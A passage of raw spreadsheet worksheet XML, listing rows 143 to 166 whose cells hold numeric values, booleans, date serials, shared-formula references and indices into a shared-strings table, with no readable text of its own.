        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="143">
      <c r="A143" s="1">
        <v>1504.0</v>
      </c>
      <c r="B143" s="2" t="s">
        <v>759</v>
      </c>
      <c r="C143" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D143" s="2" t="s">
        <v>760</v>
      </c>
      <c r="E143" s="2" t="s">
        <v>761</v>
      </c>
      <c r="F143" s="1" t="s">
        <v>762</v>
      </c>
      <c r="G143" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H143" s="1" t="s">
        <v>763</v>
      </c>
      <c r="I143" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J143" s="1" t="s">
        <v>756</v>
      </c>
      <c r="K143" s="2" t="s">
        <v>757</v>
      </c>
      <c r="L143" s="1">
        <v>7.0</v>
      </c>
      <c r="M143" s="1">
        <v>8.0</v>
      </c>
      <c r="N143" s="1" t="s">
        <v>199</v>
      </c>
      <c r="O143" s="1" t="s">
        <v>758</v>
      </c>
      <c r="P143" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q143" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R143" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S143" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="144">
      <c r="A144" s="1">
        <v>1505.0</v>
      </c>
      <c r="B144" s="2" t="s">
        <v>764</v>
      </c>
      <c r="C144" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D144" s="2" t="s">
        <v>760</v>
      </c>
      <c r="E144" s="2" t="s">
        <v>761</v>
      </c>
      <c r="F144" s="1" t="s">
        <v>420</v>
      </c>
      <c r="G144" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H144" s="1" t="s">
        <v>765</v>
      </c>
      <c r="I144" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J144" s="1" t="s">
        <v>756</v>
      </c>
      <c r="K144" s="2" t="s">
        <v>757</v>
      </c>
      <c r="L144" s="1">
        <v>7.0</v>
      </c>
      <c r="M144" s="1">
        <v>8.0</v>
      </c>
      <c r="N144" s="1" t="s">
        <v>766</v>
      </c>
      <c r="O144" s="1" t="s">
        <v>758</v>
      </c>
      <c r="P144" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q144" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R144" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S144" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="145">
      <c r="A145" s="1">
        <v>1506.0</v>
      </c>
      <c r="B145" s="2" t="s">
        <v>767</v>
      </c>
      <c r="C145" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D145" s="2" t="s">
        <v>760</v>
      </c>
      <c r="E145" s="2" t="s">
        <v>761</v>
      </c>
      <c r="F145" s="1" t="s">
        <v>768</v>
      </c>
      <c r="G145" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H145" s="1" t="s">
        <v>769</v>
      </c>
      <c r="I145" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J145" s="1" t="s">
        <v>756</v>
      </c>
      <c r="K145" s="2" t="s">
        <v>757</v>
      </c>
      <c r="L145" s="1">
        <v>7.0</v>
      </c>
      <c r="M145" s="1">
        <v>8.0</v>
      </c>
      <c r="N145" s="1" t="s">
        <v>276</v>
      </c>
      <c r="O145" s="1" t="s">
        <v>758</v>
      </c>
      <c r="P145" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q145" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R145" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S145" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="146">
      <c r="A146" s="1">
        <v>1507.0</v>
      </c>
      <c r="B146" s="2" t="s">
        <v>770</v>
      </c>
      <c r="C146" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D146" s="2" t="s">
        <v>760</v>
      </c>
      <c r="E146" s="2" t="s">
        <v>761</v>
      </c>
      <c r="F146" s="1" t="s">
        <v>771</v>
      </c>
      <c r="G146" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H146" s="1" t="s">
        <v>772</v>
      </c>
      <c r="I146" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J146" s="1" t="s">
        <v>756</v>
      </c>
      <c r="K146" s="2" t="s">
        <v>757</v>
      </c>
      <c r="L146" s="1">
        <v>7.0</v>
      </c>
      <c r="M146" s="1">
        <v>8.0</v>
      </c>
      <c r="N146" s="1" t="s">
        <v>773</v>
      </c>
      <c r="O146" s="1" t="s">
        <v>758</v>
      </c>
      <c r="P146" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q146" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R146" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S146" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="147">
      <c r="A147" s="1">
        <v>1527.0</v>
      </c>
      <c r="B147" s="2" t="s">
        <v>774</v>
      </c>
      <c r="C147" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D147" s="2" t="s">
        <v>775</v>
      </c>
      <c r="E147" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F147" s="1" t="s">
        <v>776</v>
      </c>
      <c r="G147" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H147" s="1" t="s">
        <v>777</v>
      </c>
      <c r="I147" s="1" t="s">
        <v>778</v>
      </c>
      <c r="J147" s="1" t="s">
        <v>779</v>
      </c>
      <c r="K147" s="2" t="s">
        <v>780</v>
      </c>
      <c r="L147" s="1">
        <v>5.0</v>
      </c>
      <c r="M147" s="1">
        <v>8.0</v>
      </c>
      <c r="N147" s="1" t="s">
        <v>781</v>
      </c>
      <c r="O147" s="1" t="s">
        <v>782</v>
      </c>
      <c r="P147" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q147" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R147" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S147" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="148">
      <c r="A148" s="1">
        <v>1533.0</v>
      </c>
      <c r="B148" s="2" t="s">
        <v>783</v>
      </c>
      <c r="C148" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D148" s="2" t="s">
        <v>784</v>
      </c>
      <c r="E148" s="2" t="s">
        <v>60</v>
      </c>
      <c r="F148" s="1" t="s">
        <v>785</v>
      </c>
      <c r="G148" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H148" s="4">
        <v>44716.03333333333</v>
      </c>
      <c r="I148" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J148" s="1" t="s">
        <v>786</v>
      </c>
      <c r="K148" s="2" t="s">
        <v>787</v>
      </c>
      <c r="L148" s="1">
        <v>3.0</v>
      </c>
      <c r="M148" s="1">
        <v>3.0</v>
      </c>
      <c r="N148" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O148" s="1" t="s">
        <v>788</v>
      </c>
      <c r="P148" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q148" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R148" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S148" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="149">
      <c r="A149" s="1">
        <v>1534.0</v>
      </c>
      <c r="B149" s="2" t="s">
        <v>789</v>
      </c>
      <c r="C149" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D149" s="2" t="s">
        <v>790</v>
      </c>
      <c r="E149" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F149" s="1" t="s">
        <v>791</v>
      </c>
      <c r="G149" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H149" s="4">
        <v>44716.14861111111</v>
      </c>
      <c r="I149" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J149" s="1" t="s">
        <v>786</v>
      </c>
      <c r="K149" s="2" t="s">
        <v>787</v>
      </c>
      <c r="L149" s="1">
        <v>3.0</v>
      </c>
      <c r="M149" s="1">
        <v>3.0</v>
      </c>
      <c r="N149" s="1" t="s">
        <v>792</v>
      </c>
      <c r="O149" s="1" t="s">
        <v>788</v>
      </c>
      <c r="P149" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q149" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R149" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S149" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="150">
      <c r="A150" s="1">
        <v>1535.0</v>
      </c>
      <c r="B150" s="2" t="s">
        <v>793</v>
      </c>
      <c r="C150" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D150" s="2" t="s">
        <v>794</v>
      </c>
      <c r="E150" s="2" t="s">
        <v>795</v>
      </c>
      <c r="F150" s="1" t="s">
        <v>112</v>
      </c>
      <c r="G150" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H150" s="4">
        <v>44716.86041666667</v>
      </c>
      <c r="I150" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J150" s="1" t="s">
        <v>786</v>
      </c>
      <c r="K150" s="2" t="s">
        <v>787</v>
      </c>
      <c r="L150" s="1">
        <v>3.0</v>
      </c>
      <c r="M150" s="1">
        <v>3.0</v>
      </c>
      <c r="N150" s="1" t="s">
        <v>796</v>
      </c>
      <c r="O150" s="1" t="s">
        <v>788</v>
      </c>
      <c r="P150" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q150" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R150" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S150" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="151">
      <c r="A151" s="1">
        <v>1563.0</v>
      </c>
      <c r="B151" s="2" t="s">
        <v>797</v>
      </c>
      <c r="C151" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D151" s="2" t="s">
        <v>798</v>
      </c>
      <c r="E151" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F151" s="1" t="s">
        <v>799</v>
      </c>
      <c r="G151" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H151" s="1" t="s">
        <v>800</v>
      </c>
      <c r="I151" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J151" s="1" t="s">
        <v>801</v>
      </c>
      <c r="K151" s="2" t="s">
        <v>802</v>
      </c>
      <c r="L151" s="1">
        <v>4.0</v>
      </c>
      <c r="M151" s="1">
        <v>10.0</v>
      </c>
      <c r="N151" s="1" t="s">
        <v>564</v>
      </c>
      <c r="O151" s="1" t="s">
        <v>803</v>
      </c>
      <c r="P151" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q151" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R151" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S151" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="152">
      <c r="A152" s="1">
        <v>1568.0</v>
      </c>
      <c r="B152" s="2" t="s">
        <v>804</v>
      </c>
      <c r="C152" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D152" s="2" t="s">
        <v>805</v>
      </c>
      <c r="E152" s="2" t="s">
        <v>806</v>
      </c>
      <c r="F152" s="1" t="s">
        <v>807</v>
      </c>
      <c r="G152" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H152" s="1" t="s">
        <v>808</v>
      </c>
      <c r="I152" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J152" s="1" t="s">
        <v>809</v>
      </c>
      <c r="K152" s="2" t="s">
        <v>810</v>
      </c>
      <c r="L152" s="1">
        <v>5.0</v>
      </c>
      <c r="M152" s="1">
        <v>7.0</v>
      </c>
      <c r="N152" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O152" s="1" t="s">
        <v>811</v>
      </c>
      <c r="P152" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q152" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R152" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S152" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="153">
      <c r="A153" s="1">
        <v>1569.0</v>
      </c>
      <c r="B153" s="2" t="s">
        <v>812</v>
      </c>
      <c r="C153" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D153" s="2" t="s">
        <v>111</v>
      </c>
      <c r="E153" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F153" s="1" t="s">
        <v>807</v>
      </c>
      <c r="G153" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H153" s="1" t="s">
        <v>813</v>
      </c>
      <c r="I153" s="1" t="s">
        <v>814</v>
      </c>
      <c r="J153" s="1" t="s">
        <v>815</v>
      </c>
      <c r="K153" s="2" t="s">
        <v>810</v>
      </c>
      <c r="L153" s="1">
        <v>2.0</v>
      </c>
      <c r="M153" s="1">
        <v>3.0</v>
      </c>
      <c r="N153" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O153" s="1" t="s">
        <v>816</v>
      </c>
      <c r="P153" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q153" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R153" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S153" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="154">
      <c r="A154" s="1">
        <v>1570.0</v>
      </c>
      <c r="B154" s="2" t="s">
        <v>817</v>
      </c>
      <c r="C154" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D154" s="2" t="s">
        <v>818</v>
      </c>
      <c r="E154" s="2" t="s">
        <v>819</v>
      </c>
      <c r="F154" s="1" t="s">
        <v>820</v>
      </c>
      <c r="G154" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H154" s="1" t="s">
        <v>821</v>
      </c>
      <c r="I154" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J154" s="1" t="s">
        <v>809</v>
      </c>
      <c r="K154" s="2" t="s">
        <v>810</v>
      </c>
      <c r="L154" s="1">
        <v>5.0</v>
      </c>
      <c r="M154" s="1">
        <v>7.0</v>
      </c>
      <c r="N154" s="1" t="s">
        <v>822</v>
      </c>
      <c r="O154" s="1" t="s">
        <v>811</v>
      </c>
      <c r="P154" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q154" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R154" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S154" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="155">
      <c r="A155" s="1">
        <v>1571.0</v>
      </c>
      <c r="B155" s="2" t="s">
        <v>823</v>
      </c>
      <c r="C155" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D155" s="2" t="s">
        <v>818</v>
      </c>
      <c r="E155" s="2" t="s">
        <v>819</v>
      </c>
      <c r="F155" s="1" t="s">
        <v>824</v>
      </c>
      <c r="G155" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H155" s="1" t="s">
        <v>825</v>
      </c>
      <c r="I155" s="1" t="s">
        <v>814</v>
      </c>
      <c r="J155" s="1" t="s">
        <v>815</v>
      </c>
      <c r="K155" s="2" t="s">
        <v>810</v>
      </c>
      <c r="L155" s="1">
        <v>2.0</v>
      </c>
      <c r="M155" s="1">
        <v>3.0</v>
      </c>
      <c r="N155" s="1" t="s">
        <v>826</v>
      </c>
      <c r="O155" s="1" t="s">
        <v>816</v>
      </c>
      <c r="P155" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q155" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R155" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S155" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="156">
      <c r="A156" s="1">
        <v>1572.0</v>
      </c>
      <c r="B156" s="2" t="s">
        <v>827</v>
      </c>
      <c r="C156" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D156" s="2" t="s">
        <v>818</v>
      </c>
      <c r="E156" s="2" t="s">
        <v>819</v>
      </c>
      <c r="F156" s="1" t="s">
        <v>828</v>
      </c>
      <c r="G156" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H156" s="1" t="s">
        <v>829</v>
      </c>
      <c r="I156" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J156" s="1" t="s">
        <v>809</v>
      </c>
      <c r="K156" s="2" t="s">
        <v>810</v>
      </c>
      <c r="L156" s="1">
        <v>5.0</v>
      </c>
      <c r="M156" s="1">
        <v>7.0</v>
      </c>
      <c r="N156" s="1" t="s">
        <v>688</v>
      </c>
      <c r="O156" s="1" t="s">
        <v>811</v>
      </c>
      <c r="P156" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q156" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R156" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S156" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="157">
      <c r="A157" s="1">
        <v>1573.0</v>
      </c>
      <c r="B157" s="2" t="s">
        <v>830</v>
      </c>
      <c r="C157" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D157" s="2" t="s">
        <v>831</v>
      </c>
      <c r="E157" s="2" t="s">
        <v>832</v>
      </c>
      <c r="F157" s="1" t="s">
        <v>807</v>
      </c>
      <c r="G157" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H157" s="1" t="s">
        <v>833</v>
      </c>
      <c r="I157" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J157" s="1" t="s">
        <v>809</v>
      </c>
      <c r="K157" s="2" t="s">
        <v>810</v>
      </c>
      <c r="L157" s="1">
        <v>5.0</v>
      </c>
      <c r="M157" s="1">
        <v>7.0</v>
      </c>
      <c r="N157" s="1" t="s">
        <v>834</v>
      </c>
      <c r="O157" s="1" t="s">
        <v>811</v>
      </c>
      <c r="P157" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q157" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R157" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S157" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="158">
      <c r="A158" s="1">
        <v>1574.0</v>
      </c>
      <c r="B158" s="2" t="s">
        <v>835</v>
      </c>
      <c r="C158" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D158" s="2" t="s">
        <v>831</v>
      </c>
      <c r="E158" s="2" t="s">
        <v>684</v>
      </c>
      <c r="F158" s="1" t="s">
        <v>807</v>
      </c>
      <c r="G158" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H158" s="1" t="s">
        <v>836</v>
      </c>
      <c r="I158" s="1" t="s">
        <v>814</v>
      </c>
      <c r="J158" s="1" t="s">
        <v>815</v>
      </c>
      <c r="K158" s="2" t="s">
        <v>810</v>
      </c>
      <c r="L158" s="1">
        <v>2.0</v>
      </c>
      <c r="M158" s="1">
        <v>3.0</v>
      </c>
      <c r="N158" s="1" t="s">
        <v>837</v>
      </c>
      <c r="O158" s="1" t="s">
        <v>816</v>
      </c>
      <c r="P158" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q158" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R158" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S158" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="159">
      <c r="A159" s="1">
        <v>1575.0</v>
      </c>
      <c r="B159" s="2" t="s">
        <v>838</v>
      </c>
      <c r="C159" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D159" s="2" t="s">
        <v>831</v>
      </c>
      <c r="E159" s="2" t="s">
        <v>832</v>
      </c>
      <c r="F159" s="1" t="s">
        <v>807</v>
      </c>
      <c r="G159" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H159" s="1" t="s">
        <v>839</v>
      </c>
      <c r="I159" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J159" s="1" t="s">
        <v>809</v>
      </c>
      <c r="K159" s="2" t="s">
        <v>810</v>
      </c>
      <c r="L159" s="1">
        <v>5.0</v>
      </c>
      <c r="M159" s="1">
        <v>7.0</v>
      </c>
      <c r="N159" s="1" t="s">
        <v>681</v>
      </c>
      <c r="O159" s="1" t="s">
        <v>811</v>
      </c>
      <c r="P159" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q159" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R159" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S159" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="160">
      <c r="A160" s="1">
        <v>1578.0</v>
      </c>
      <c r="B160" s="2" t="s">
        <v>840</v>
      </c>
      <c r="C160" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D160" s="2" t="s">
        <v>841</v>
      </c>
      <c r="E160" s="2" t="s">
        <v>99</v>
      </c>
      <c r="F160" s="1" t="s">
        <v>842</v>
      </c>
      <c r="G160" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H160" s="4">
        <v>43831.29791666667</v>
      </c>
      <c r="I160" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J160" s="1" t="s">
        <v>843</v>
      </c>
      <c r="K160" s="2" t="s">
        <v>844</v>
      </c>
      <c r="L160" s="1">
        <v>2.0</v>
      </c>
      <c r="M160" s="1">
        <v>6.0</v>
      </c>
      <c r="N160" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O160" s="1" t="s">
        <v>845</v>
      </c>
      <c r="P160" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q160" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R160" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S160" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="161">
      <c r="A161" s="1">
        <v>1584.0</v>
      </c>
      <c r="B161" s="2" t="s">
        <v>846</v>
      </c>
      <c r="C161" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D161" s="2" t="s">
        <v>847</v>
      </c>
      <c r="E161" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F161" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G161" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H161" s="4">
        <v>44507.930555555555</v>
      </c>
      <c r="I161" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J161" s="1" t="s">
        <v>848</v>
      </c>
      <c r="K161" s="2" t="s">
        <v>849</v>
      </c>
      <c r="L161" s="1">
        <v>3.0</v>
      </c>
      <c r="M161" s="1">
        <v>4.0</v>
      </c>
      <c r="N161" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O161" s="1" t="s">
        <v>850</v>
      </c>
      <c r="P161" s="1" t="s">
        <v>851</v>
      </c>
      <c r="Q161" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R161" s="2">
        <f t="shared" si="2"/>
        <v>16</v>
      </c>
      <c r="S161" s="1">
        <f t="shared" si="3"/>
        <v>16</v>
      </c>
    </row>
    <row r="162">
      <c r="A162" s="1">
        <v>1611.0</v>
      </c>
      <c r="B162" s="2" t="s">
        <v>852</v>
      </c>
      <c r="C162" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D162" s="2" t="s">
        <v>853</v>
      </c>
      <c r="E162" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F162" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G162" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H162" s="1" t="s">
        <v>854</v>
      </c>
      <c r="I162" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J162" s="1" t="s">
        <v>855</v>
      </c>
      <c r="K162" s="2" t="s">
        <v>856</v>
      </c>
      <c r="L162" s="1">
        <v>1.0</v>
      </c>
      <c r="M162" s="1">
        <v>1.0</v>
      </c>
      <c r="N162" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O162" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P162" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q162" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R162" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S162" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="163">
      <c r="A163" s="1">
        <v>1622.0</v>
      </c>
      <c r="B163" s="2" t="s">
        <v>857</v>
      </c>
      <c r="C163" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D163" s="2" t="s">
        <v>858</v>
      </c>
      <c r="E163" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F163" s="1" t="s">
        <v>859</v>
      </c>
      <c r="G163" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H163" s="1" t="s">
        <v>860</v>
      </c>
      <c r="I163" s="1" t="s">
        <v>742</v>
      </c>
      <c r="J163" s="1" t="s">
        <v>861</v>
      </c>
      <c r="K163" s="2" t="s">
        <v>862</v>
      </c>
      <c r="L163" s="1">
        <v>1.0</v>
      </c>
      <c r="M163" s="1">
        <v>1.0</v>
      </c>
      <c r="N163" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O163" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P163" s="1" t="s">
        <v>863</v>
      </c>
      <c r="Q163" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R163" s="2">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="S163" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="164">
      <c r="A164" s="1">
        <v>1623.0</v>
      </c>
      <c r="B164" s="2" t="s">
        <v>864</v>
      </c>
      <c r="C164" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D164" s="2" t="s">
        <v>865</v>
      </c>
      <c r="E164" s="2" t="s">
        <v>684</v>
      </c>
      <c r="F164" s="1" t="s">
        <v>866</v>
      </c>
      <c r="G164" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H164" s="1" t="s">
        <v>867</v>
      </c>
      <c r="I164" s="1" t="s">
        <v>92</v>
      </c>
      <c r="J164" s="1" t="s">
        <v>868</v>
      </c>
      <c r="K164" s="2" t="s">
        <v>869</v>
      </c>
      <c r="L164" s="1">
        <v>1.0</v>
      </c>
      <c r="M164" s="1">
        <v>1.0</v>
      </c>
      <c r="N164" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O164" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P164" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q164" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R164" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S164" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="165">
      <c r="A165" s="1">
        <v>1624.0</v>
      </c>
      <c r="B165" s="2" t="s">
        <v>870</v>
      </c>
      <c r="C165" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D165" s="2" t="s">
        <v>871</v>
      </c>
      <c r="E165" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F165" s="1" t="s">
        <v>694</v>
      </c>
      <c r="G165" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H165" s="1" t="s">
        <v>872</v>
      </c>
      <c r="I165" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J165" s="1" t="s">
        <v>873</v>
      </c>
      <c r="K165" s="2" t="s">
        <v>874</v>
      </c>
      <c r="L165" s="1">
        <v>2.0</v>
      </c>
      <c r="M165" s="1">
        <v>2.0</v>
      </c>
      <c r="N165" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O165" s="1" t="s">
        <v>875</v>
      </c>
      <c r="P165" s="1" t="s">
        <v>876</v>
      </c>
      <c r="Q165" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R165" s="2">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="S165" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="166">
      <c r="A166" s="1">
        <v>1625.0</v>
      </c>
      <c r="B166" s="2" t="s">
        <v>877</v>
      </c>
      <c r="C166" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D166" s="2" t="s">
        <v>878</v>
      </c>
      <c r="E166" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F166" s="1" t="s">
        <v>879</v>
      </c>
      <c r="G166" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H166" s="1" t="s">
        <v>880</v>
      </c>
      <c r="I166" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J166" s="1" t="s">
        <v>873</v>
      </c>
      <c r="K166" s="2" t="s">
        <v>874</v>
      </c>
      <c r="L166" s="1">
        <v>2.0</v>
      </c>
      <c r="M166" s="1">
        <v>2.0</v>
      </c>
      <c r="N166" s="1" t="s">
        <v>875</v>
      </c>
